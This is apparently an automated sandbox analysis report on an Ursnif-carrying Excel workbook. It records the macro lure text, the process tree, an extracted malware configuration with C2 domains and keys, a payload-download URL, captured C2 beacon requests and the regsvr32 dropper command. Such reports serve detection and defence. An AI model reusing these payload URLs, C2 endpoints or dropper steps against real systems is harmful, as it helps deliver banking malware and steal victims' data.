Analysis Report my_attach_82862.xlsb

Overview

General Information

Sample Name: my_attach_82862.xlsb
Analysis ID: 433009
MD5: 1f155a8f8c53066ef9dba8520cbcf346
SHA1: 75dda503a5f1bbb11c8de9236ff237a7989e8e80
SHA256: 29b13fa315a5249d1654221cf944f097ac4b0c42a133d07365cd3cc6afdd1a10
Detection

Hidden Macro 4.0 Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Potential thread-based time evasion detected
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes or reads registry keys via WMI
Writes registry values via WMI
Abnormal high CPU Usage
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Registers a DLL
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5988 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6180 cmdline: regsvr32 -s C:/Users/Public/SettingSyncY.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 6412 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6436 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6412 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5448 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5724 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5448 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5308 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5516 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5308 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6200 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6012 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6200 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "oUnY8+/8G/QjijBEa03/PDDCyhbZrtKtx8eYSXLSbmKpR2omzPKPDVDiaj+dBCVC5Sp5s16D5EsjkO+S9MLdqEPK+/EAZI0qxYwv0GmWkXSlJi4jyYyJKc5a5Nek5/cWbmHSXPW+Rq2S8QAD5SioqB8j4ScC8nSuqcxPZwTdEUXuTG36kAdjIfamPdH5DlrmzxdodFTkShIE2IKM5O/dCTIwhTSQIj7YF2w9akzONLDoXT8cJE2CEp0UrlGkTtCcRTWQr67rMF2nSqm+ctweTZRfgBKtrDgiEDrXnhmUscy59twRBz1A7dRDpJryotUEkXjZHrb6gv4q0NjsbeCK4Jw4zYJf7CO+eANF3Bou0fo=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "jT7xNsiVSW2IugIq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: regsvr32 -s C:/Users/Public/SettingSyncY.dll, CommandLine: regsvr32 -s C:/Users/Public/SettingSyncY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5988, ProcessCommandLine: regsvr32 -s C:/Users/Public/SettingSyncY.dll, ProcessId: 6180

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: https://quickbooks.aeymotors.com/soft.dll | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000003.00000003.285300360.0000000003010000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "oUnY8+/8G/QjijBEa03/PDDCyhbZrtKtx8eYSXLSbmKpR2omzPKPDVDiaj+dBCVC5Sp5s16D5EsjkO+S9MLdqEPK+/EAZI0qxYwv0GmWkXSlJi4jyYyJKc5a5Nek5/cWbmHSXPW+Rq2S8QAD5SioqB8j4ScC8nSuqcxPZwTdEUXuTG36kAdjIfamPdH5DlrmzxdodFTkShIE2IKM5O/dCTIwhTSQIj7YF2w9akzONLDoXT8cJE2CEp0UrlGkTtCcRTWQr67rMF2nSqm+ctweTZRfgBKtrDgiEDrXnhmUscy59twRBz1A7dRDpJryotUEkXjZHrb6gv4q0NjsbeCK4Jw4zYJf7CO+eANF3Bou0fo=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "jT7xNsiVSW2IugIq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
Multi AV Scanner detection for domain / URL
Source: authd.feronok.com | Virustotal: Detection: 11%
Source: app.bighomegl.at | Virustotal: Detection: 6%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 50.87.220.158:443 -> 192.168.2.3:49714 version: TLS 1.2
Source: Binary string: c:\571\bar\Nature\industry\Son.pdb source: regsvr32.exe, soft[1].dll.0.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\Public\SettingSyncY.dll
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: soft[1].dll.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe
Source: Joe Sandbox View | ASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /j0D4WkqJA4qbSI2s/tbqllkJ5QjS02c9/Y4oADFKhbig2E3MZ8L/S5BHZDPll/SOOSmvbSSzszfQOGO_2F/ebssg7ZOH9iTiK1egYa/TYvtl48FqSo7aXNnyk8zDn/0M4_2F1RU9EXO/TpeNu_2B/RPWPT_2BSfoiOaYRvUkNxcz/WR4a1P2fCQ/k1EnQMOdYbM0XsiH2/reukwmEF53hW/xa5HBUgFOAx/sGDiJ22uuBIopz/tZj9wmd1r7z3ANuAYbfIk/bhnJIJVnJvAXbS6_/2Fsif8yHgRIg6fa/a0BPP1Z_2FHpWsn1gk/fe5cFcowW/IKK9U HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: authd.feronok.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/rwrgpqZOvNV/mxBLQ1oxc7jv8k/5tQFefyNUnYTHJj33dQKu/YqZyqYfZuaOHFPro/3D3_2B6kK9arKKX/Wf1dZBj8QqS_2BWWVF/B7Ahpx3M5/Q3B93_2FcSTrCmxypMPT/8JVp8AUZzhfuucVY_2B/wCiIRjjYq_2FqoNLK9B6bf/0aSehXg9FwafT/cgt8pMOQ/HbDCojQOV1FVprYRnxx13U1/UwN8_2B_2F/vzILJE71SBej4gvGi/FIWIlMn9n/L3 HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: authd.feronok.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /8N_2FW41xDzjkhrWQ/7Li83vNh8E0s/iNweknKPsr4/wqFKfz34i2ath6/I0bXROB0tUnNMBxp8qE25/AmJwK10jn6MVat3G/t7FuQx2zVw1ffa5/c7cpkHpQnz9kmDbUqx/Otf3v0Da9/dQZioOeK9Dz9hNXsqwu1/tlEzuHEM4S9kJrg9zGq/RjBYXn9MjpOQGxui0wmfPX/po6OMlacqL3xm/d_2FBFj8/AujuAR6DuH05PJMkT_2BTvZ/D_2BlXEdZ3/ZBW_2FuilrCeiWMje/rHsDq9syNU01/kSBqmc5Fyr_/2B3baeMNkKHxqo/p7TsHB_2FsB3Yjr2vV_2F/OiBfbqWQAEP/P_2F HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: app.bighomegl.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2BdpzYbVr0QWXmBP9v/GO1k2SCoSQjXR/yxhwTnmC/pDIJ9c_2Bm_2FrJ_2B9wee3/JVSl6ysora/rGjwo8YPYfbP9mT94/HzBvhbCiqM7B/Bi1eHCPiGVL/46J0oLxANcfziq/thqSh_2Bozif3G_2Fo_2F/k6b3HZTG7RK0p_2F/ovJUD_2BB3IEisf/V1SwB6D9ZycfRmjdXo/1wtqe3ptL/omd3M4svRRs8_2F1Zp8h/fMxrdwrQxKRQQ81i3US/ttoCJ HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: authd.feronok.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /1KWgQnO99/jRkbuys9zmBRLf_2Bfsk/j4hnRgNwvnusz6igqqU/69TUSClHMklgWWKD_2F1Zz/rzeT_2BYOFVhf/cyHjXUJp/RmO3IoI8my48PUoCkU_2Bq5/Szeo_2BZSo/JGYOsrFv3PDanQVBJ/aQVxlvGnm7ma/EvG_2Fcbphd/B7D_2FsJViKTei/G4P6ADPlZ3kryG2o13jPZ/lht8TN_2BF0SOOm1/wlXy9yuuvEg2t5t/0qJz6tISKUfXu3ooK_/2B_2FN_2B/Y8QRyMSJiCCXzc8ct_2F/cWxPiUkWHFklqYWaKgD/HT4v_2FZjRB5pDpaTPvsKl/vHhtteYEDrQEo/F_2BGZVP/fKC323Rf/6 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: app.bighomegl.at
Source: msapplication.xml0.20.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.20.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.20.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.20.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.20.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.20.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown | DNS traffic detected: queries for: quickbooks.aeymotors.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 11 Jun 2021 03:07:35 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {C1F50A29-CAAD-11EB-90E4-ECF4BB862DED}.dat.34.dr | String found in binary or memory: http://app.bighomegl.at/8N_2FW41xDzjkhrWQ/7Li83vNh8E0s/iNweknKPsr4/wqFKfz34i2ath6/I0bXROB0tUnNMBxp8q
Source: ~DF60CBFC830128400E.TMP.36.dr, {CFEFB1DE-CAAD-11EB-90E4-ECF4BB862DED}.dat.36.dr | String found in binary or memory: http://authd.feronok.com/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2
Source: {B403EC44-CAAD-11EB-90E4-ECF4BB862DED}.dat.29.dr | String found in binary or memory: http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/
Source: {99BBC3ED-CAAD-11EB-90E4-ECF4BB862DED}.dat.20.dr | String found in binary or memory: http://authd.feronok.com/j0D4WkqJA4qbSI2s/tbqllkJ5QjS02c9/Y4oADFKhbig2E3MZ8L/S5BHZDPll/SOOSmvbSSzszf
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://outlook.office365.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pages.store.office.com/review/query
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://powerlift.acompli.net
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
              Source: sharedStrings.bin | String found in binary or memory: https://quickbooks.aeymotors.com/soft.dll
              Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknown | HTTPS traffic detected: 50.87.220.158:443 -> 192.168.2.3:49714 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              Yara detected Ursnif
              Source: Yara match | File source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY

              E-Banking Fraud:

              Yara detected Ursnif (same Yara matches as listed above)

              System Summary:

              Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
              Source: Screenshot number: 4 | Screenshot OCR: Enable Editing 10 from the yellow bar above 11 12 13 Once You have Enable Editing, please clic
              Source: Screenshot number: 4 | Screenshot OCR: Enable Content 14 from the yellow bar above 15 16 17 ,, WHY I CANNOT OPEN THIS DOCUMENT? 19 2
              Found abnormal large hidden Excel 4.0 Macro sheet
              Source: my_attach_82862.xlsb | Initial sample: Sheet size: 290224
              Office process drops PE file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\Public\SettingSyncY.dll
              Writes or reads registry keys via WMI
              Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
              Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Writes registry values via WMI
              Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\SysWOW64\regsvr32.exe | Process Stats: CPU usage > 98%
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67CD1EC7 NtMapViewOfSection,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67CD1B9C GetProcAddress,NtCreateSection,memset,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67CD2485 NtQueryVirtualMemory,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: String function: 67D30F70 appears 31 times
              Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
              Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSB@15/67@7/2
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{C19FFCDB-9AC4-4A6F-922D-69857FBC944B} - OProcSessId.dat
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
              Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:/Users/Public/SettingSyncY.dll
              Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6412 CREDAT:17410 /prefetch:2
              Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5448 CREDAT:17410 /prefetch:2
              Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5308 CREDAT:17410 /prefetch:2
              Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6200 CREDAT:17410 /prefetch:2
              Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: my_attach_82862.xlsb | Initial sample: OLE zip file path = xl/media/image1.png
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
              Source: Binary string: c:\571\bar\Nature\industry\Son.pdb | source: regsvr32.exe, soft[1].dll.0.dr
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67CD1F7C LoadLibraryA,GetProcAddress,
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67CD2253 push ecx; ret
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67CD2200 push ecx; ret
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67D30FB5 push ecx; ret
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67CDEBB5 pushfd ; iretd
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67CE0B16 pushad ; iretd
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67CE10D4 push 04853024h; retf
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_67CE2807 pushad ; retf

              Boot Survival:

              Drops PE files to the user root directory
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\Public\SettingSyncY.dll

              Hooking and other Techniques for Hiding and Protection:

              Yara detected Ursnif (same Yara matches as listed above)
              Source: C:\Windows\SysWOW64\regsvr32.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              Potential thread-based time evasion detected
              Source: Initial file | Signature Results: Thread-based counter
